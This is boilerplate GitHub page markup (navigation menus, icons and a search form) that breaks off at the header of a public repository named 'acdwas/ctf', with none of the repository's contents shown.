<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="124655323" data-scoped-search-url="/acdwas/ctf/search" data-owner-scoped-search-url="/users/acdwas/search" data-unscoped-search-url="/search" data-turbo="false" action="/acdwas/ctf/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="WeXdRhHfsKyVY4ws+UwApg/0SY75GFHXKvco4l2+aonWJeYuac45rl7dB979nUY7q+y0YVFsbomBGxbradshyw==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> acdwas </span> <span>/</span> ctf
<span></span><span>Public</span> </div>
</div>
